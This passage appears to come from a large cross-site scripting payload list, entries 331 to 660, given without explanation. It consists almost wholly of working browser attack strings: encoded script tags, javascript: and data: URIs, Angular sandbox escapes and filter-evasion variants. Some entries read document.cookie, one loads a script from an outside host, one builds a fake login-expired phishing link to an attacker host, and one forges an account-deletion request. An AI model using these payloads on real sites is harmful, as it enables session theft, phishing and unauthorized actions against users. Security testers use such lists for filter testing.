  331. +ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-
  332. a. click()
  333. {{a=’constructor’;b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,’alert(1)’)()}}
  334. {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1} } };alert(1)//’);}}
  335. {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=1}}};alert(1)//’);}}
  336. {{‘a’.constructor.prototype.charAt=[].join;$eval(‘x=alert(1)’);}}
  337. {{‘a’.constructor.prototype.charAt=’’.valueOf;$eval(“x=’\”+(y=’if(!window\\u002ex)alert(window\\u002ex=1)’)+eval(y)+\”’”);}}
  338. <A?cript/async/src=//a?a?L>
  339. action=//localhost/self/login.php?returnURL=changemail.php>
  340. <a data-remote=true data-method=delete href=/delete_account>CLICK</a>
  341. a=document.createElement(‘a’)
  342. +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);
  343. +ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-
  344. +ADw-SCRIPT+AD4-alert(1);+ADw-/SCRIPT+AD4-
  345. +ADw-script+AD4-alert(+ACI-XSS+ACI-)+ADw-/script+AD4-
  346. +ADw-script+AD4-alert(document.location)+ADw-/script+AD4-
  347. };a=eval;b=alert;a(b(12));//
  348. ‘};a=eval;b=alert;a(b(13));//
  349. ‘];a=eval;b=alert;a(b(15));//
  350. ];a=eval;b=alert;a(b(16));//
  351. */a=eval;b=alert;a(b(/e/.source));/*
  352. a=/ev/ .source a+=/al/ .source,a = a[a] a(name)
  353. a=/ev/// .source a+=/al/// .source a[a] (name)
  354. “><a fooooooooooooooooooooooooooooooooo href=JaVAScript%26colon%3Bprompt%26lpar%3B1%26rpar%3B%>
  355. <!a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(2)//”>
  356. <?a foo=x=`y><img alt=”`><img src=xx:x onerror=alert(3)//”>
  357. a=function(){},(p=>p.c=()=>alert(‘d’))(a.prototype),b=new a,b.c()
  358. a=”get”;
  359. a=\”get\”;
  360. a=”;get”;;&;#10;b=”;URL(“;”;;&;#10;c=”;javascript:”;;&;#10;d=”;alert(‘;XSS’;);”;)”;;&#10;eval(a+b+c+d);
  361. a=”get”;&#10;b=”URL(“”;&#10;c=”javascript:”;&#10;d=”alert(‘XSS’);”)”;eval(a+b+c+d);
  362. a=”get”;b=”URL”;c=”javascript:”;d=”alert(1);”;eval(a+b+c+d);
  363. a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘X10SS’);”;eval(a+b+c+d);
  364. a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a?);
  365. a=”get”;b=”URL”;c=”javascript:”;d=”alert(‘xss’);”;eval(a+b+c+d);
  366. a=”get”; b=”URL(\””; c=”javascript:”; d=”alert(‘XSS’);\”)”; eval(a+b+c+d);
  367. a=”get”;b=”URL(\””;c=”javascript:”;d=”alert(‘XSS’);\”)”;eval(a+b+c+d);
  368. a=”get”;b=”URL(ja\””;c=”vascr”;d=”ipt:ale”;e=”rt(‘XSS’);\”)”;eval(a+b+c+d+e);
  369. <% a=%&gt&lt;iframe/onload=alert(1)//>
  370. aHAnDQp4Lm9wZW4oJ0dFVCcscCtmLDApDQp4LnNlbmQoKQ0KJD0n
  371. aha <script src=>alert(/IE|Opera/)</script>
  372. <a href=````>
  373. a.href=’#’
  374. <a/href[\0C]=ja&Tab;vasc&Tab;ript&colon;confirm(1)>XXX</a>
  375. <a href=[0x0b]” onclick=confirm(1)//”>click</a>
  376. <a href=[0x0b]renwax23" onfocus=prompt(1) autofocus fragment=”
  377. <a href=”&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41">Test</a>
  378. <a href=”&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#1 14&#109&#40&#49&#41">Clickhere</a>
  379. <a href=”&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
  380. <a href=”&#1;javascript:alert(1)”>CLICK ME<a>
  381. <a href=”&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38& #35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#4 9&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49& #38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#3 8&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>
  382. <a href=”&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>
  383. <a href=”about:<script>document.vulnerable=true;</script>”>
  384. <! — <A href=”- →<a href=javascript:alert:document.domain>test →
  385. <a href=”[a]java[b]script[c]:alert(1)”>XXX</a>
  386. <a href=����&amp;/onclick=alert(9)>foo</a>
  387. ?a href=asfunction:System.Security.allowDomain,evilhost?
  388. <a href=”//ben.mario#%0Aalert(3);”>CLICKME</a>
  389. <a href=``calc``>
  390. <a href=”//???????”>click</a>
  391. <a href=”data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>click</a>?
  392. <a href=”data:application/x-x509-user-cert;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>click</a>
  393. <a href=”data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”&#09;&#10;&#11;>X</a
  394. <a href=”data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==” >X</a
  395. <a/href=data&colon;text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==>ClickMe</a>
  396. <a href=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”><img src=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”></a>
  397. <a href=”data:),< s c r i p t > a l e r t ( document.domain ) < / s c r i p t >”>CLICK</a>
  398. <a href=”data:text/html,%3cscript>confirm &#40;1&#41;&lt;/script&gt;” >hello
  399. “><a href=”data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+”>click</a>
  400. <a href=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+>clickme
  401. <a href=��data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+��>ClickMe
  402. <a href=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+>ClickMe
  403. <a href=”data:text/html;base64,PHN2Zy?9vbmxv?YWQ<>>9YWxlc>>>nQoMSk”>click</a>
  404. <a href=”data:text/html;base64,PHN2Zye?L9vbmxva?EYWQ<>>9YWxlc>>>nQoMSk+”>click</a>
  405. <a href=��data:text/html;base64,PHNjcmlwdD5hbGVydCg5KTwvc2NyaXB0Pg��>foo</a>
  406. <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>test</a>
  407. <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgnMScpPC9zY3JpcHQ+ “>click<a>
  408. <a href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4=”>Test</a>
  409. <a HREF=”data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==”>ugh</a>
  410. <a href=’data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==’>click<a>
  411. <a href=”data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>”>X</a
  412. <a href=”data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>”>X</a
  413. “/><a href=”data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>”>X</a
  414. <a href=”data:text/html;base64xoxoxox,<body/onload=alert(1)>”>click</a>
  415. <a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  416. <a href=”data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>
  417. <a href=��data:text/html;charset=utf-16,%ff%fe%3c%00s%00c%00r%00i%00p%00t%00%3e%00a%00l%00e%00r%00t%00(%009%00)%00<%00/%00s%00c%00r%00i%00p%00t%00>%00��>foo</a>
  418. <a href=”data:text/html,<script>eval(name)</script>” target=”alert(‘ @garethheyes @0x6D6172696F ‘)”>click</a>
  419. <a href=”data:text/html,<script>eval(name)</script>” target=”confirm(1)”>click</a>
  420. <a$href=”data:text/html,%style=””3cscript>confirm((1)</sstyle=””cript>” onerror=>hello
  421. <a href=”data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt”>Click<test>
  422. <a href=”data:text&sol;html;&Tab;base64&NewLine;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==”>Click<test>
  423. <a href=``explorer.exe``>
  424. <a href=”feed:javascript&colon;alert(1)”>click</a>
  425. <;A HREF=”;//google”;>;XSS<;/A>;
  426. <A HREF=”//google”>XSS</A>
  427. <;A HREF=”;http://0102.0146.0007.00000223/";>;XSS<;/A>;
  428. <A HREF=”http://0102.0146.0007.00000223/">XSS</A>
  429. <A HREF=”http://0300.0250.0000.0001>XSS</A>
  430. <;A HREF=”;http://0x42.0x0000066.0x7.0x93/";>;XSS<;/A>;
  431. <A HREF=”http://0x42.0x0000066.0x7.0x93/">XSS</A>
  432. <A HREF=”http://0xc0.0xa8.000.001>XSS</A>
  433. <;A HREF=”;http://1113982867/";>;XSS<;/A>;
  434. <A HREF=”http://1113982867/">XSS</A>
  435. <A HREF=”http://127.0.0.1/">XSS</A>
  436. <A HREF=”http://3232235521>XSS</A>
  437. <A HREF=”http://3w.org">XSS</A>
  438. <A HREF=”http://6&#09;6.000146.0x7.147/">XSS</A>
  439. <A HREF=”htt p://6 6.000146.07.147/””>XSS</A>
  440. <A HREF=”http://6 6.000146.07.147/””>XSS</A>
  441. <A HREF=”h tt p://6 6.000146.0x7.147/”>XSS</A>
  442. <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
  443. <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
  444. <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
  445. <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
  446. <A HREF=”htt p://6 6.000146.0x7.147/”>XSS</A>
  447. <A HREF=http://66.102.7.147/>link</A>
  448. <;A HREF=”;http://66.102.7.147/";>;XSS<;/A>;
  449. <A HREF=”http://66.102.7.147/">XSS</A>
  450. <A HREF=”h tt p://6&#9;6.000146.0x7.147/”>XSS</A>
  451. <A HREF=”htt p://6&#9;6.000146.0x7.147/”>XSS</A>
  452. <A HREF=http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D>link</A>
  453. <;A HREF=”;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D";>;XSS<;/A>;
  454. <A HREF=”http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
  455. <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=x:x onerror=javascript:alert(1)></a>”>
  456. <a href=http://foo.bar/#x=`y></a><img alt=”`><img src=xx:x onerror=alert(1)></a>”>
  457. <;A HREF=”;http://google.com/";>;XSS<;/A>;
  458. <A HREF=”http://google.com/">XSS</A>
  459. <;A HREF=”;http://google:ha.ckers.org";>;XSS<;/A>;
  460. <A HREF=”http://google:ha.ckers.org">XSS</A>
  461. <;A HREF=”;http://ha.ckers.org@google";>;XSS<;/A>;
  462. <A HREF=”http://ha.ckers.org@google">XSS</A>
  463. <a href=”https://4294967298915183000">click</a>=>google
  464. <a href=https://attacker/>Session expired. Please login again.</a>
  465. <a href=”http://”/><script>alert(‘zombie’)</script>@www.grayhat.in/">hackers</a>
  466. <A href=http://www.gohttp://www.google.com/ogle.com/>link</A>;
  467. <A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
  468. <;A HREF=”;http://www.gohttp://www.google.com/ogle.com/";>;XSS<;/A>;
  469. <A HREF=”http://www.gohttp://www.google.com/ogle.com/">XSS</A>
  470. <a href=http://www.google.com">Clickme</a>
  471. <a href=��http://www.google.com>Clickme</a>
  472. <a href=http://www.google.com>Clickme</a>
  473. <;A HREF=”;http://www.google.com./";>;XSS<;/A>;
  474. <A HREF=”http://www.google.com./">XSS</A>
  475. <a href=”http://www.xyydyt.com" style=”color:#143d70; simsun;” onclick=”alert(/a/);this.style.behavior=’url(#default#homepage)’;this.setHomePage(‘http://www.xyydyt.com'); return(false);”>asdasdsad</a>
  476. <A HREF=ht://www.google.com/>link</A>
  477. <;A HREF=”;h&#x0A;tt&#09;p://6&;#09;6.000146.0x7.147/”;>;XSS<;/A>;
  478. <a href=”// ID.ws”>CLICK
  479. <a href=����&<img&amp;/onclick=alert(9)>foo</a>
  480. <a href=”invalid:1" id=x name=y>test</a>
  481. “/><a href=”invalid:2" id=x name=y>test</a>
  482. <a href=”j&#00000000000000097vascript:window[‘confirm’](1)”>aa</a>
  483. <a href=”j&#00097;vascript:alert%252831337%2529">Hello</a>
  484. <a href=”j[785 bytes of ]avascript:alert(1);”>XSS</a>
  485. <a href=”j[785 bytes of (&NewLine;&Tab;)]avascript:alert(1);”>XSS</a>
  486. <a href=”jav&#65ascript:javascript:alert(1)”>test1</a>
  487. <a href=”jav&#97ascript:javascript:alert(1)”>test1</a>
  488. <a href=”java&#115;cript:alert(‘xss’)”>link</a>
  489. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:alert(1)>XXX</a>
  490. <a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>
  491. <a+href=”javas&#99;ript&#35;alert(1);”>
  492. <a href=”javascrip:alert(document.cookie)”>
  493. <a href=”jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/ — !&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e”>click me</a>
  494. <a href=”javascript://%0d(0===0&&1==1)%0c?alert(1):confirm(2)”>click</a>
  495. <a/href=”javascript:&#13; javascript:prompt(1)”><input type=”X”>
  496. <a href=”//javascript:99999999/1?/YOU_MUST_HIT_RETURN<svg onload=confirm(1)>/:0">Right click open in new tab</a>
  497. <a href=javascript:alert(1)>
  498. <a href=javascript:alert(163)>click
  499. <a href=javascript:alert(19)>M
  500. <a href=javascript:alert(1)>click
  501. <a href=javascript:alert(1)>click
  502. <a href=javascript:alert(1)>Clickme</a>
  503. <a href=”javascript:alert(1)-html”>click me</a>
  504. <a href=”javascript:alert(1)//html”>click me</a>
  505. <a href=”javascript:alert(1)”>Link</a>
  506. <a href=”javascript:alert(1)” onmouseover=alert(1)>INJECTX HOVER</a>
  507. <a href = “javas cript :ale rt(1)”>test
  508. <a href=javascript:alert%28 /xss/%29>clickme
  509. <a href=”javascript:alert(3)”>Link</a>
  510. <a href=”javascript:alert(72)%%0D3C! — 
  511. <a href=”javascript:alert(9)”>atul t</a>
  512. <a href=javascript:alert(9) href href=�� href=����>foo</a>
  513. <a href=”javascript:alert(‘test’)”>link</a>
  514. <a href=”javascript:alert(‘xss’)”>
  515. <a href=”javascript#alert(‘XSS’);”>
  516. ><a href=javascript:alert(/Xss-By-Muhaddi/)Click Me</a>
  517. ><a href=javascript:alert(/Xss/)Click Me</a>
  518. ��><a href=javascript:alert(/Xss/)Click Me</a>
  519. <a href=”javascript:&aopf;&lscr;&efr;&rfr;&topf;(1)”>CLICKME</a>
  520. <a href=��javascript:��>Clickme</a>
  521. <a href=javascript:>Clickme</a>
  522. <a href=”javascript&colon;alert&lpar;1&rpar;”>click</a>
  523. <a href=”jAvAsCrIpT&colon;alert&lpar;1&rpar;”>X</a>
  524. <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
  525. <a href=”javascript&colon;alert&lpar;document&period;domain&rpar;”>Click Here</a>
  526. <a href=”javascript&colon;&apos;<script src=/&sol;&ETH;.pw&nvgt;</script&nvgt;&apos;”>CLICK</a>
  527. <a href=javascript&colon;confirm(2)>M
  528. <a href=”jAvAsCrIpT&colon;confirm&lpar;1&rpar;”>X</a>
  529. “><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a>
  530. “/><a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click Here</a>
  531. <a href=javascript&colon;confirm&lpar;document&period;cookie&rpar;>Click-XSS</a>
  532. “><a/href=javascript&colon;co\u006efir\u006d&#40;&quot;1&quot;&#41;>clickme</a>
  533. <a href=”javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;”><button>
  534. “><a href=”javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;”><button>
  535. <A/HREF=”javascript:confirm(1)”>
  536. “><a href=”javascript:confirm%28 1%29">Clickme</a>
  537. “><a href=”javascript:co\u006efir\u006d%28 1%29">Clickme</a>
  538. <a href=”javascript:data:alert(1)”>click</a>
  539. <A HREF=”javascript:document.location=’http://www.google.com/’”>link</A>
  540. <;A HREF=”;javascript:document.location=';http://www.google.com/';";>;XSS<;/A>;
  541. <A HREF=”javascript:document.location=’http://www.google.com/'">XSS</A>
  542. <a href=”javascript#document.vulnerable=true;”>
  543. <a href=”javascript:document.write(‘spoof’); void(0);”>Middle-click me</a>
  544. “><a href=”JAVASCRIPT:%E2%80%A8alert`1`”>
  545. <a href=”javascript:’hello’” rel=”sidebar”>x</a>
  546. <a href=’javascript:http://@cc_on/confirm%28location%29'>click</a>
  547. <a href=”javascript:javascript:alert(1)”><event-source src=”data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A”>
  548. <a/href=”javascript: javascript:prompt(1)”><input type=”X”>
  549. <a href=javascript:…>me</a>
  550. “><a href=javascript:prompt(1)>Clickme</a>
  551. “><a href=javascript:prompt%28 1%29>Clickme</a>
  552. <a href=”javascript:void(0)”>click</a>
  553. <a href=”javascript:void(0)” onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>
  554. <a href=”javascript:void(0)” onmouseover=&NewLine;javascript:confirm(1)&NewLine;>X</a>
  555. <a href=”javascript\x00:javascript:alert(1)” id=”fuzzelement1">test</a>
  556. <a href=”javascript\x09:javascript:alert(1)” id=”fuzzelement1">test</a>
  557. <a href=”javascript\x0A:javascript:alert(1)” id=”fuzzelement1">test</a>
  558. <a href=”javascript\x0D:javascript:alert(1)” id=”fuzzelement1">test</a>
  559. <a href=javascript&.x3A;alert&(x28;1&)x29;//=>
  560. <a href=javascript&.x3A;confirm&(x28;1&)x29;//=>clickme
  561. <a href=”javascript\x3A:javascript:alert(1)” id=”fuzzelement1">test</a>
  562. <a href=”javascript\x3Ajavascript:alert(1)” id=”fuzzelement1">test</a>
  563. <a href=”javascript:x=open(‘http://www.xiaonei.com/');setInterval (function(){try{x.frames[0].location={toString:function(){return%20’http://xssor.io/Project/poc/docshell.html';}}}catch(e){}},3000);void(1);">Test</a>
  564. <a href=javascript:/**/XYZ:alert(202)>Test_202</a>
  565. <a href=javascript:/*XYZ*/XYZ:javascript:alert(201)>Test_201</a>
  566. <a href=��javaScrRipt:alert(1)��>Clickme</a>
  567. <a href=javaScrRipt:alert(1)>Clickme</a>
  568. <a href=”javas&Tab;cri&NewLine;pt:confirm(1)”>test</a>
  569. <a href=”javas\x00cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  570. <a href=”javas\x01cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  571. <a href=”javas\x02cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  572. <a href=”javas\x03cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  573. <a href=”javas\x04cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  574. <a href=”javas\x05cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  575. <a href=”javas\x06cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  576. <a href=”javas\x07cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  577. <a href=”javas\x08cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  578. <a href=”javas\x09cript:javascript:alert(1)” id=”fuzzelement1">test</a>
  579. <a href=”javas\x0Acript:javascript:alert(1)” id=”fuzzelement1">test</a>
  580. <a href=”javas\x0Bcript:javascript:alert(1)” id=”fuzzelement1">test</a>
  581. <a href=”javas\x0Ccript:javascript:alert(1)” id=”fuzzelement1">test</a>
  582. <a href=”javas\x0Dcript:javascript:alert(1)” id=”fuzzelement1">test</a>
  583. <a/href=java&Tab;script:confirm%28/XSS/%29>click</a>
  584. <a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;confirm&lpar;1&rpar;”>Click<test>
  585. <a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;1&rpar;”>Click<test>
  586. <a href=”j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074&lpar;1&rpar;” >Click<test>
  587. <a/href=”j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:confirm&lpar;1&rpar;”>Click<test>
  588. <a href=”j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>
  589. <a href=”j&#x26;#x26#x41;vascript:alert%252831337%2529">Hello</a>
  590. a href=”j&#x26;#x26#x41;vascript:confirm%252831337%2529">Hello</a>
  591. <a href=”j&#x61;vascript:&#x61;lert(-1)”
  592. <a <! — → href=”j&#x61;vascript:&#x61;lert(-1)”>hello</a>
  593. <a <! — href=”j&#x61;vascript:&#x61;lert&#x28;31337&#x29;;”>Hello</a>
  594. <a href=``mspaint.exe``>
  595. <a href=``notepad.exe``>
  596. <a href=”#” onclick=”alert(1)”>s</a>
  597. <a href=”#” onclick=”alert(‘ &#39&#41&#59&#97&#108&#101&#114&#116&#40&#50 ‘)”>name</a>
  598. <a href= . ����\�� onclick=alert(9) ������>foo</a>
  599. <a href=”” onclick=``/*/alt=”*//alert(1)//”>clickme</a>
  600. <a href=”#” onclick=”confirm(‘ &#39&#41&#59&#97&#108&#101&#114&#116&#40&#50 ‘)”>name</a>
  601. <a href=”” onclick=``/name==alert(1)>clickme</a>
  602. <a href=”” onmousedown=”var name = ‘&#39;;alert(1)//’; alert(‘smthg’)”>Link</a>
  603. <a href=’#’ onmouseover =”javascript:$(‘a’).html(5)”>a link</a>
  604. <a href=[?]”? onmouseover=prompt(1)//”>XYZ</a
  605. <a href=”?q=javascript%3Aalert(31)”>Link</a>
  606. <a href=”rhainfosec.com” onclimbatree=alert(1)>ClickHere</a>
  607. <a href=”rhainfosec.com” onmouseover=alert(1)>ClickHere</a>
  608. <a href=``shell:System``>
  609. <a href=”&sol;&sol;&filig;.org”>CLICKME</a>
  610. <a href=”&sol;&sol;&Gopf;&Oscr;&order;&gscr;&Laplacetrf;&ee;.&complexes;&ofr;&Mellintrf;”>CLICKME</a>
  611. <a href target=_blank>click</a>
  612. <a href=//target rel=noreferer target=pkav>click</a>
  613. <a href=uhttp://www.google.com">Clickme</a>
  614. <a href=’vbscript:MsgBox(“XSS”)’>link</a>
  615. <a href=’vbscript:”&#x5c&quot&confirm(1)&#39&#39"’>
  616. <a href=vjavascript:alert(1)v>Clickme</a>
  617. <a href=vUserinputv>Click</a>
  618. <a href=”\/www.google.com/favicon.ico">click</a>
  619. <;A HREF=”;//www.google.com/";>;XSS<;/A>;
  620. <A HREF=”//www.google.com/">XSS</A>
  621. <a href=”\x00javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  622. <a href=”\x01javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  623. <a href=”\x02javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  624. <a href=”\x03javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  625. <a href=”\x04javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  626. <a href=”\x05javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  627. <a href=”\x06javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  628. <a href=”\x07javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  629. <a href=”\x08javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  630. <a href=”\x09javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  631. <a href=”\x0Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  632. <a href=”\x0Bjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  633. <a href=”\x0Cjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  634. <a href=”\x0Djavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  635. <a href=”\x0Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  636. <a href=”\x0Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  637. <a href=”\x10javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  638. <a href=”\x11javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  639. <a href=”\x12javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  640. <a href=”\x13javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  641. <a href=”\x14javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  642. <a href=”\x15javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  643. <a href=”\x16javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  644. <a href=”\x17javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  645. <a href=”\x18javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  646. <a href=”\x19javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  647. <a href=”\x1Ajavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  648. <a href=”\x1Bjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  649. <a href=”\x1Cjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  650. <a href=”\x1Djavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  651. <a href=”\x1Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  652. <a href=”\x1Fjavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  653. <a href=”\x20javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  654. <a href=”&#x3000;javascript:alert(1)”>click</a>
  655. <a href=”\xC2\xA0javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  656. <a href=”x:confirm(1)” id=”test”>click</a><script>eval(test+’’)</script>
  657. <a href=”\xE1\x9A\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  658. <a href=”\xE1\xA0\x8Ejavascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  659. <a href=”\xE2\x80\x80javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
  660. <a href=”\xE2\x80\x81javascript:javascript:alert(1)” id=”fuzzelement1">test</a>
